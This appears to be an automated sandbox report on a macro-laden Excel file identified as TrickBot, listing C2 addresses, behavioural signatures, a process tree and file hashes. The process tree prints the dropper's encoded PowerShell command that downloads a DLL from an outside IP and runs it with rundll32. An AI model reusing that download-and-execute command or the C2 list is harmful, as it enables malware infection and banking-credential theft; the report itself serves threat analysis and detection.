RNP-00152.xlsm

General
Target

RNP-00152.xlsm

Filesize

87KB

Completed

21-10-2021 15:14

Score
10/10
MD5

7ac2366ab4515b9f37be3187deea9bc0

SHA1

c4cee812f0fb97c510e149a28c1a55b6c5da2c9e

SHA256

0b149fc1f48da1d2c02d778be120427483403cd7519fc7f69e741288b120cb9d

Malware Config

Extracted

Family trickbot
Version 100019
Botnet rob136
C2

65.152.201.203:443

185.56.175.122:443

46.99.175.217:443

179.189.229.254:443

46.99.175.149:443

181.129.167.82:443

216.166.148.187:443

46.99.188.223:443

128.201.76.252:443

62.99.79.77:443

60.51.47.65:443

24.162.214.166:443

45.36.99.184:443

97.83.40.67:443

184.74.99.214:443

103.105.254.17:443

62.99.76.213:443

82.159.149.52:443

Attributes
autorun
Name:pwgrabb
Name:pwgrabc
ecc_pubkey.base64
Signatures 12

Filter: none

Discovery
  • Process spawned unexpected child process
    cmd.exe

    Description

    This typically indicates the parent process was compromised via an exploit or macro.

    Reported IOCs

    descriptionpidpid_targetprocesstarget process
    Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process46763032cmd.exeEXCEL.EXE
  • Trickbot

    Description

    Developed in 2016, TrickBot is one of the more recent banking Trojans.

  • Blocklisted process makes network request
    powershell.exe

    Reported IOCs

    flowpidprocess
    411508powershell.exe
  • Downloads MZ/PE file
  • Loads dropped DLL
    rundll32.exe

    Reported IOCs

    pidprocess
    1240rundll32.exe
  • Checks processor information in registry
    EXCEL.EXE

    Description

    Processor information is often read in order to detect sandboxing environments.

    TTPs

    Query RegistrySystem Information Discovery

    Reported IOCs

    descriptioniocprocess
    Key opened\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0EXCEL.EXE
    Key value queried\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHzEXCEL.EXE
    Key value queried\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameStringEXCEL.EXE
  • Enumerates system info in registry
    EXCEL.EXE

    TTPs

    Query RegistrySystem Information Discovery

    Reported IOCs

    descriptioniocprocess
    Key opened\REGISTRY\MACHINE\Hardware\Description\System\BIOSEXCEL.EXE
    Key value queried\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamilyEXCEL.EXE
    Key value queried\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKUEXCEL.EXE
  • Suspicious behavior: AddClipboardFormatListener
    EXCEL.EXE

    Reported IOCs

    pidprocess
    3032EXCEL.EXE
  • Suspicious behavior: EnumeratesProcesses
    powershell.exe

    Reported IOCs

    pidprocess
    1508powershell.exe
    1508powershell.exe
    1508powershell.exe
  • Suspicious use of AdjustPrivilegeToken
    powershell.exewermgr.exe

    Reported IOCs

    descriptionpidprocess
    Token: SeDebugPrivilege1508powershell.exe
    Token: SeDebugPrivilege4556wermgr.exe
  • Suspicious use of SetWindowsHookEx
    EXCEL.EXE

    Reported IOCs

    pidprocess
    3032EXCEL.EXE
    3032EXCEL.EXE
    3032EXCEL.EXE
    3032EXCEL.EXE
    3032EXCEL.EXE
    3032EXCEL.EXE
    3032EXCEL.EXE
    3032EXCEL.EXE
    3032EXCEL.EXE
    3032EXCEL.EXE
    3032EXCEL.EXE
    3032EXCEL.EXE
  • Suspicious use of WriteProcessMemory
    EXCEL.EXEcmd.exerundll32.exerundll32.exe

    Reported IOCs

    descriptionpidprocesstarget process
    PID 3032 wrote to memory of 46763032EXCEL.EXEcmd.exe
    PID 3032 wrote to memory of 46763032EXCEL.EXEcmd.exe
    PID 4676 wrote to memory of 15084676cmd.exepowershell.exe
    PID 4676 wrote to memory of 15084676cmd.exepowershell.exe
    PID 4676 wrote to memory of 13684676cmd.exerundll32.exe
    PID 4676 wrote to memory of 13684676cmd.exerundll32.exe
    PID 1368 wrote to memory of 12401368rundll32.exerundll32.exe
    PID 1368 wrote to memory of 12401368rundll32.exerundll32.exe
    PID 1368 wrote to memory of 12401368rundll32.exerundll32.exe
    PID 1240 wrote to memory of 17361240rundll32.execmd.exe
    PID 1240 wrote to memory of 17361240rundll32.execmd.exe
    PID 1240 wrote to memory of 17361240rundll32.execmd.exe
    PID 1240 wrote to memory of 45561240rundll32.exewermgr.exe
    PID 1240 wrote to memory of 45561240rundll32.exewermgr.exe
    PID 1240 wrote to memory of 45561240rundll32.exewermgr.exe
    PID 1240 wrote to memory of 45561240rundll32.exewermgr.exe
Processes 7
  • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\RNP-00152.xlsm"
    Checks processor information in registry
    Enumerates system info in registry
    Suspicious behavior: AddClipboardFormatListener
    Suspicious use of SetWindowsHookEx
    Suspicious use of WriteProcessMemory
    PID:3032
    • C:\Windows\System32\cmd.exe
      C:\Windows\System32\cmd.exe /c start /B /WAIT powershell -enc SQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAALQBVAHIAaQAgACIAaAB0AHQAcAA6AC8ALwA0ADUALgA4ADYALgA2ADUALgAxADkANwAvAGkAbQBhAGcAZQBzAC8AcwB1AGIAegBlAHIAbwAuAHAAbgBnACIAIAAtAE8AdQB0AEYAaQBsAGUAIAAiAEMAOgBcAFAAcgBvAGcAcgBhAG0ARABhAHQAYQBcAGMAbABiAC4AZABsAGwAIgA= & start C:\Windows\System32\rundll32.exe C:\ProgramData\clb.dll,AloperNoteW
      Process spawned unexpected child process
      Suspicious use of WriteProcessMemory
      PID:4676
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -enc SQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAALQBVAHIAaQAgACIAaAB0AHQAcAA6AC8ALwA0ADUALgA4ADYALgA2ADUALgAxADkANwAvAGkAbQBhAGcAZQBzAC8AcwB1AGIAegBlAHIAbwAuAHAAbgBnACIAIAAtAE8AdQB0AEYAaQBsAGUAIAAiAEMAOgBcAFAAcgBvAGcAcgBhAG0ARABhAHQAYQBcAGMAbABiAC4AZABsAGwAIgA=
        Blocklisted process makes network request
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        PID:1508
      • C:\Windows\System32\rundll32.exe
        C:\Windows\System32\rundll32.exe C:\ProgramData\clb.dll,AloperNoteW
        Suspicious use of WriteProcessMemory
        PID:1368
        • C:\Windows\SysWOW64\rundll32.exe
          C:\Windows\System32\rundll32.exe C:\ProgramData\clb.dll,AloperNoteW
          Loads dropped DLL
          Suspicious use of WriteProcessMemory
          PID:1240
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe
            PID:1736
          • C:\Windows\system32\wermgr.exe
            C:\Windows\system32\wermgr.exe
            Suspicious use of AdjustPrivilegeToken
            PID:4556
Network
MITRE ATT&CK Matrix
Collection
    Command and Control
      Credential Access
        Defense Evasion
          Execution
            Exfiltration
              Impact
                Initial Access
                  Lateral Movement
                    Persistence
                      Privilege Escalation
                        Replay Monitor
                        00:00 00:00
                        Downloads
                        • C:\ProgramData\clb.dll

                          MD5

                          d0a80e47fefaecb2f3e020fecf8288b7

                          SHA1

                          06267a23e36f50b2f4f14d668190465a98d5cf91

                          SHA256

                          9c0b5647a38a04a289b926c143cde952b1a5869a60ebfbe383ec5231aae750d2

                          SHA512

                          b2f2c1860da49fb59e8e91542ef0f2c7788a72a44f88f1dbe83bd63cbe17bc4c200f9b77fd78d83ac1dbc1ac45e2ac1e788ebd364689e6ff28cb5ddb2f13f5e7

                        • \ProgramData\clb.dll

                          MD5

                          d0a80e47fefaecb2f3e020fecf8288b7

                          SHA1

                          06267a23e36f50b2f4f14d668190465a98d5cf91

                          SHA256

                          9c0b5647a38a04a289b926c143cde952b1a5869a60ebfbe383ec5231aae750d2

                          SHA512

                          b2f2c1860da49fb59e8e91542ef0f2c7788a72a44f88f1dbe83bd63cbe17bc4c200f9b77fd78d83ac1dbc1ac45e2ac1e788ebd364689e6ff28cb5ddb2f13f5e7

                        • memory/1240-322-0x00000000033E0000-0x00000000033E1000-memory.dmp

                        • memory/1240-320-0x0000000004CA0000-0x0000000004F08000-memory.dmp

                        • memory/1240-321-0x0000000004FD0000-0x0000000005015000-memory.dmp

                        • memory/1240-318-0x0000000000000000-mapping.dmp

                        • memory/1240-323-0x0000000010001000-0x0000000010003000-memory.dmp

                        • memory/1368-316-0x0000000000000000-mapping.dmp

                        • memory/1508-301-0x0000014FFB483000-0x0000014FFB485000-memory.dmp

                        • memory/1508-311-0x0000014FFB486000-0x0000014FFB488000-memory.dmp

                        • memory/1508-288-0x0000000000000000-mapping.dmp

                        • memory/1508-300-0x0000014FFB480000-0x0000014FFB482000-memory.dmp

                        • memory/3032-115-0x00007FFD783B0000-0x00007FFD783C0000-memory.dmp

                        • memory/3032-141-0x0000020274BE0000-0x0000020274BE2000-memory.dmp

                        • memory/3032-127-0x00007FFD783B0000-0x00007FFD783C0000-memory.dmp

                        • memory/3032-121-0x0000020274BE0000-0x0000020274BE2000-memory.dmp

                        • memory/3032-119-0x0000020274BE0000-0x0000020274BE2000-memory.dmp

                        • memory/3032-120-0x0000020274BE0000-0x0000020274BE2000-memory.dmp

                        • memory/3032-118-0x00007FFD783B0000-0x00007FFD783C0000-memory.dmp

                        • memory/3032-117-0x00007FFD783B0000-0x00007FFD783C0000-memory.dmp

                        • memory/3032-116-0x00007FFD783B0000-0x00007FFD783C0000-memory.dmp

                        • memory/4556-324-0x0000000000000000-mapping.dmp

                        • memory/4556-325-0x000002742B920000-0x000002742B949000-memory.dmp

                        • memory/4556-326-0x000002742BA40000-0x000002742BA41000-memory.dmp

                        • memory/4676-287-0x0000000000000000-mapping.dmp